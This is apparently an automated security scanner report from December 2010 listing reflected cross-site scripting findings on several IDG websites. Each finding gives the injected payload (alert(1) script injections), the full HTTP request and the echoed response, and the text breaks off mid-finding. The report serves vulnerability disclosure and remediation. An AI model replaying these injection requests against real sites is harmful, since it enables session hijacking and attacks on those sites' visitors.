The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2c921"%3b457004f577f was submitted in the REST URL parameter 3. This input was echoed as 2c921";457004f577f in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /www/HomeNew.nsf/docs2c921"%3b457004f577f/U.S._Sales HTTP/1.1 Host: www.idg.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Server: Lotus-Domino Date: Thu, 16 Dec 2010 13:24:17 GMT Connection: close Expires: Tue, 01 Jan 1980 06:00:00 GMT Content-Type: text/html; charset=US-ASCII Content-Length: 5019 Cache-control: no-cache
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" /> <link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" /> <!-- Section for ordinary idg.co ...[SNIP]... <script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-79134-4"); pageTracker._trackPageview("IDG.com - Page not found - /www/HomeNew.nsf/docs2c921";457004f577f/U.S._Sales"); } catch(err) {}</script> ...[SNIP]...
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ac956"%3bb0523ff90b0 was submitted in the REST URL parameter 4. This input was echoed as ac956";b0523ff90b0 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /www/HomeNew.nsf/docs/U.S._Salesac956"%3bb0523ff90b0 HTTP/1.1 Host: www.idg.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Server: Lotus-Domino Date: Thu, 16 Dec 2010 13:24:20 GMT Connection: close Expires: Tue, 01 Jan 1980 06:00:00 GMT Content-Type: text/html; charset=US-ASCII Content-Length: 5019 Cache-control: no-cache
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" /> <link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" /> <!-- Section for ordinary idg.co ...[SNIP]... <script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-79134-4"); pageTracker._trackPageview("IDG.com - Page not found - /www/HomeNew.nsf/docs/U.S._Salesac956";b0523ff90b0"); } catch(err) {}</script> ...[SNIP]...
2.317. http://www.idg.com/www/HomeNew.nsf/docs/U.S._Sales [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.idg.com
Path:
/www/HomeNew.nsf/docs/U.S._Sales
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload acacf"-alert(1)-"9d1688cc828 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /www/HomeNew.nsf/docs/U.S._Sales?acacf"-alert(1)-"9d1688cc828=1 HTTP/1.1 Host: www.idg.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 400 Bad Request Server: Lotus-Domino Date: Thu, 16 Dec 2010 13:23:54 GMT Connection: close Expires: Tue, 01 Jan 1980 06:00:00 GMT Content-Type: text/html; charset=US-ASCII Content-Length: 5032 Cache-control: no-cache
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" /> <link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" /> <!-- Section for ordinary idg.co ...[SNIP]... <script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-79134-4"); pageTracker._trackPageview("IDG.com - Page not found - /www/HomeNew.nsf/docs/U.S._Sales?acacf"-alert(1)-"9d1688cc828=1"); } catch(err) {}</script> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 215b0"%3ba214fe83243 was submitted in the REST URL parameter 1. This input was echoed as 215b0";a214fe83243 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /www215b0"%3ba214fe83243/HomeNew.nsf/docs/about_IDG HTTP/1.1 Host: www.idg.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Server: Lotus-Domino Date: Thu, 16 Dec 2010 13:23:51 GMT Connection: close Expires: Tue, 01 Jan 1980 06:00:00 GMT Content-Type: text/html; charset=US-ASCII Content-Length: 5018 Cache-control: no-cache
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" /> <link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" /> <!-- Section for ordinary idg.co ...[SNIP]... <script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-79134-4"); pageTracker._trackPageview("IDG.com - Page not found - /www215b0";a214fe83243/HomeNew.nsf/docs/about_IDG"); } catch(err) {}</script> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 70cc4"%3bd9b78be8f40 was submitted in the REST URL parameter 3. This input was echoed as 70cc4";d9b78be8f40 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /www/HomeNew.nsf/docs70cc4"%3bd9b78be8f40/about_IDG HTTP/1.1 Host: www.idg.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Server: Lotus-Domino Date: Thu, 16 Dec 2010 13:23:54 GMT Connection: close Expires: Tue, 01 Jan 1980 06:00:00 GMT Content-Type: text/html; charset=US-ASCII Content-Length: 5018 Cache-control: no-cache
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" /> <link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" /> <!-- Section for ordinary idg.co ...[SNIP]... <script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-79134-4"); pageTracker._trackPageview("IDG.com - Page not found - /www/HomeNew.nsf/docs70cc4";d9b78be8f40/about_IDG"); } catch(err) {}</script> ...[SNIP]...
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 377cf"%3b2780271a98a was submitted in the REST URL parameter 4. This input was echoed as 377cf";2780271a98a in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /www/HomeNew.nsf/docs/about_IDG377cf"%3b2780271a98a HTTP/1.1 Host: www.idg.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Server: Lotus-Domino Date: Thu, 16 Dec 2010 13:23:56 GMT Connection: close Expires: Tue, 01 Jan 1980 06:00:00 GMT Content-Type: text/html; charset=US-ASCII Content-Length: 5018 Cache-control: no-cache
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" /> <link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" /> <!-- Section for ordinary idg.co ...[SNIP]... <script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-79134-4"); pageTracker._trackPageview("IDG.com - Page not found - /www/HomeNew.nsf/docs/about_IDG377cf";2780271a98a"); } catch(err) {}</script> ...[SNIP]...
2.321. http://www.idg.com/www/HomeNew.nsf/docs/about_IDG [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.idg.com
Path:
/www/HomeNew.nsf/docs/about_IDG
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4365e"-alert(1)-"1d7117f9b61 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /www/HomeNew.nsf/docs/about_IDG?4365e"-alert(1)-"1d7117f9b61=1 HTTP/1.1 Host: www.idg.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 400 Bad Request Server: Lotus-Domino Date: Thu, 16 Dec 2010 13:23:44 GMT Connection: close Expires: Tue, 01 Jan 1980 06:00:00 GMT Content-Type: text/html; charset=US-ASCII Content-Length: 5031 Cache-control: no-cache
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" /> <link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" /> <!-- Section for ordinary idg.co ...[SNIP]... <script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-79134-4"); pageTracker._trackPageview("IDG.com - Page not found - /www/HomeNew.nsf/docs/about_IDG?4365e"-alert(1)-"1d7117f9b61=1"); } catch(err) {}</script> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d12fe"%3b1936f8b7000 was submitted in the REST URL parameter 1. This input was echoed as d12fe";1936f8b7000 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /wwwd12fe"%3b1936f8b7000/idgdir.nsf/ContactSearch HTTP/1.1 Host: www.idg.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Server: Lotus-Domino Date: Thu, 16 Dec 2010 13:23:33 GMT Connection: close Expires: Tue, 01 Jan 1980 06:00:00 GMT Content-Type: text/html; charset=US-ASCII Content-Length: 5016 Cache-control: no-cache
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" /> <link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" /> <!-- Section for ordinary idg.co ...[SNIP]... <script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-79134-4"); pageTracker._trackPageview("IDG.com - Page not found - /wwwd12fe";1936f8b7000/idgdir.nsf/ContactSearch"); } catch(err) {}</script> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c6aa5"%3bc354528816a was submitted in the REST URL parameter 3. This input was echoed as c6aa5";c354528816a in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /www/idgdir.nsf/ContactSearchc6aa5"%3bc354528816a HTTP/1.1 Host: www.idg.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Server: Lotus-Domino Date: Thu, 16 Dec 2010 13:23:35 GMT Connection: close Expires: Tue, 01 Jan 1980 06:00:00 GMT Content-Type: text/html; charset=US-ASCII Content-Length: 5016 Cache-control: no-cache
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" /> <link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" /> <!-- Section for ordinary idg.co ...[SNIP]... <script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-79134-4"); pageTracker._trackPageview("IDG.com - Page not found - /www/idgdir.nsf/ContactSearchc6aa5";c354528816a"); } catch(err) {}</script> ...[SNIP]...
2.324. http://www.idg.com/www/idgdir.nsf/ContactSearch [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.idg.com
Path:
/www/idgdir.nsf/ContactSearch
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8f109"><script>alert(1)</script>0b5f290174a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /www/idgdir.nsf/ContactSearch?readForm&8f109"><script>alert(1)</script>0b5f290174a=1 HTTP/1.1 Host: www.idg.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Lotus-Domino Date: Thu, 16 Dec 2010 13:23:36 GMT Connection: close Last-Modified: Thu, 16 Dec 2010 13:23:35 GMT Expires: Tue, 01 Jan 1980 06:00:00 GMT Content-Type: text/html; charset=US-ASCII Content-Length: 14262 Cache-control: no-cache
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>IDG.com: Contact Us ...[SNIP]... <input name="QUERY_STRING" id="QUERY_STRING" type="hidden" value="readForm&8f109"><script>alert(1)</script>0b5f290174a=1"> ...[SNIP]...
2.325. http://www.idg.com/www/idgdir.nsf/ContactSearch [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.idg.com
Path:
/www/idgdir.nsf/ContactSearch
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload de40f"-alert(1)-"5bd5d0eb955 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /www/idgdir.nsf/ContactSearch?de40f"-alert(1)-"5bd5d0eb955=1 HTTP/1.1 Host: www.idg.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 400 Bad Request Server: Lotus-Domino Date: Thu, 16 Dec 2010 13:23:29 GMT Connection: close Expires: Tue, 01 Jan 1980 06:00:00 GMT Content-Type: text/html; charset=US-ASCII Content-Length: 5029 Cache-control: no-cache
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" /> <link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" /> <!-- Section for ordinary idg.co ...[SNIP]... <script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-79134-4"); pageTracker._trackPageview("IDG.com - Page not found - /www/idgdir.nsf/ContactSearch?de40f"-alert(1)-"5bd5d0eb955=1"); } catch(err) {}</script> ...[SNIP]...
The value of the readForm request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 999aa"-alert(1)-"1378acd8a25 was submitted in the readForm parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /www/idgdir.nsf/ContactSearch?readForm999aa"-alert(1)-"1378acd8a25 HTTP/1.1 Host: www.idg.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 500 Internal Server Error Server: Lotus-Domino Date: Thu, 16 Dec 2010 13:23:34 GMT Connection: close Expires: Tue, 01 Jan 1980 06:00:00 GMT Content-Type: text/html; charset=US-ASCII Content-Length: 5035 Cache-control: no-cache
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" /> <link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" /> <!-- Section for ordinary idg.co ...[SNIP]... <script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-79134-4"); pageTracker._trackPageview("IDG.com - Page not found - /www/idgdir.nsf/ContactSearch?readForm999aa"-alert(1)-"1378acd8a25"); } catch(err) {}</script> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ba745"%3b6e7bf86569e was submitted in the REST URL parameter 1. This input was echoed as ba745";6e7bf86569e in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /wwwba745"%3b6e7bf86569e/pr.nsf/pr_rss HTTP/1.1 Host: www.idg.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Server: Lotus-Domino Date: Thu, 16 Dec 2010 13:23:56 GMT Connection: close Expires: Tue, 01 Jan 1980 06:00:00 GMT Content-Type: text/html; charset=US-ASCII Content-Length: 5005 Cache-control: no-cache
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" /> <link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" /> <!-- Section for ordinary idg.co ...[SNIP]... <script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-79134-4"); pageTracker._trackPageview("IDG.com - Page not found - /wwwba745";6e7bf86569e/pr.nsf/pr_rss"); } catch(err) {}</script> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 52fb7"%3b361197f22a2 was submitted in the REST URL parameter 3. This input was echoed as 52fb7";361197f22a2 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /www/pr.nsf/pr_rss52fb7"%3b361197f22a2 HTTP/1.1 Host: www.idg.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Server: Lotus-Domino Date: Thu, 16 Dec 2010 13:24:09 GMT Connection: close Expires: Tue, 01 Jan 1980 06:00:00 GMT Content-Type: text/html; charset=US-ASCII Content-Length: 5005 Cache-control: no-cache
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" /> <link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" /> <!-- Section for ordinary idg.co ...[SNIP]... <script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-79134-4"); pageTracker._trackPageview("IDG.com - Page not found - /www/pr.nsf/pr_rss52fb7";361197f22a2"); } catch(err) {}</script> ...[SNIP]...
2.329. http://www.idg.com/www/pr.nsf/pr_rss [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.idg.com
Path:
/www/pr.nsf/pr_rss
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 134a0"-alert(1)-"7ba533571c6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /www/pr.nsf/pr_rss?134a0"-alert(1)-"7ba533571c6=1 HTTP/1.1 Host: www.idg.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 400 Bad Request Server: Lotus-Domino Date: Thu, 16 Dec 2010 13:23:42 GMT Connection: close Expires: Tue, 01 Jan 1980 06:00:00 GMT Content-Type: text/html; charset=US-ASCII Content-Length: 5018 Cache-control: no-cache
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" /> <link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" /> <!-- Section for ordinary idg.co ...[SNIP]... <script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-79134-4"); pageTracker._trackPageview("IDG.com - Page not found - /www/pr.nsf/pr_rss?134a0"-alert(1)-"7ba533571c6=1"); } catch(err) {}</script> ...[SNIP]...
The value of the cat request parameter is copied into the HTML document as plain text between tags. The payload b5964<script>alert(1)</script>40a9d0fc7f1 was submitted in the cat parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /blogs/?cat=1b5964<script>alert(1)</script>40a9d0fc7f1 HTTP/1.1 Host: www.idgknowledgehub.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __unam=a2d74e9-12cef22fc96-63603bda-9; __utmz=163783655.1292502236.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=163783655.938968462.1292502236.1292502236.1292504918.2; __utmc=163783655; __qca=P0-34259952-1292504918745; __utmb=163783655.8.10.1292504918;
Response
HTTP/1.1 404 Not Found Date: Thu, 16 Dec 2010 13:24:59 GMT Server: Apache/2.0.52 (Red Hat) X-Powered-By: PHP/5.2.14 X-Pingback: http://www.idgknowledgehub.com/blogs/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Thu, 16 Dec 2010 13:25:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 16900
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>IDG Knowledge Hub : ...[SNIP]... <p>You tried going to http://www.idgknowledgehub.com/blogs/blogs/?cat=1b5964<script>alert(1)</script>40a9d0fc7f1 and it doesn't exist. All is not lost! You can click back and try again or search for what you're looking for: <form method="get" id="searchform" action="idgknowledgehub.com/blogs/index.php ...[SNIP]...
The value of the tag request parameter is copied into the HTML document as plain text between tags. The payload 45eef<script>alert(1)</script>6a4993aa7eb was submitted in the tag parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /blogs/?tag=digital-marketing-news45eef<script>alert(1)</script>6a4993aa7eb HTTP/1.1 Host: www.idgknowledgehub.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __unam=a2d74e9-12cef22fc96-63603bda-9; __utmz=163783655.1292502236.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=163783655.938968462.1292502236.1292502236.1292504918.2; __utmc=163783655; __qca=P0-34259952-1292504918745; __utmb=163783655.8.10.1292504918;
Response
HTTP/1.1 404 Not Found Date: Thu, 16 Dec 2010 13:25:02 GMT Server: Apache/2.0.52 (Red Hat) X-Powered-By: PHP/5.2.14 X-Pingback: http://www.idgknowledgehub.com/blogs/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Thu, 16 Dec 2010 13:25:02 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 16921
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>IDG Knowledge Hub : ...[SNIP]... <p>You tried going to http://www.idgknowledgehub.com/blogs/blogs/?tag=digital-marketing-news45eef<script>alert(1)</script>6a4993aa7eb and it doesn't exist. All is not lost! You can click back and try again or search for what you're looking for: <form method="get" id="searchform" action="idgknowledgehub.com/blogs/index.php ...[SNIP]...
The value of the video request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 65c6c'%3balert(1)//46fddd9382d was submitted in the video parameter. This input was echoed as 65c6c';alert(1)//46fddd9382d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /library/?video=CorpOverview65c6c'%3balert(1)//46fddd9382d HTTP/1.1 Host: www.idgknowledgehub.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __unam=a2d74e9-12cef22fc96-63603bda-9; __utmz=163783655.1292502236.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=163783655.938968462.1292502236.1292502236.1292504918.2; __utmc=163783655; __qca=P0-34259952-1292504918745; __utmb=163783655.8.10.1292504918;
Response
HTTP/1.1 200 OK Date: Thu, 16 Dec 2010 13:27:33 GMT Server: Apache/2.0.52 (Red Hat) X-Powered-By: PHP/5.2.14 Connection: close Content-Type: text/html Content-Length: 12003
2.333. http://www.idgmarketfusion.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.idgmarketfusion.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 88c9b"-alert(1)-"814141dc9b3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?88c9b"-alert(1)-"814141dc9b3=1 HTTP/1.1 Host: www.idgmarketfusion.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 400 Bad Request Server: Lotus-Domino Date: Thu, 16 Dec 2010 13:30:58 GMT Connection: close Expires: Tue, 01 Jan 1980 06:00:00 GMT Content-Type: text/html; charset=US-ASCII Content-Length: 5016 Cache-control: no-cache
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" /> <link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" /> <!-- Section for ordinary idg.co ...[SNIP]... <script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-79134-4"); pageTracker._trackPageview("IDG.com - Page not found - /www/homenew.nsf?88c9b"-alert(1)-"814141dc9b3=1"); } catch(err) {}</script> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 5d6f7<script>alert(1)</script>f6dba030f35 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
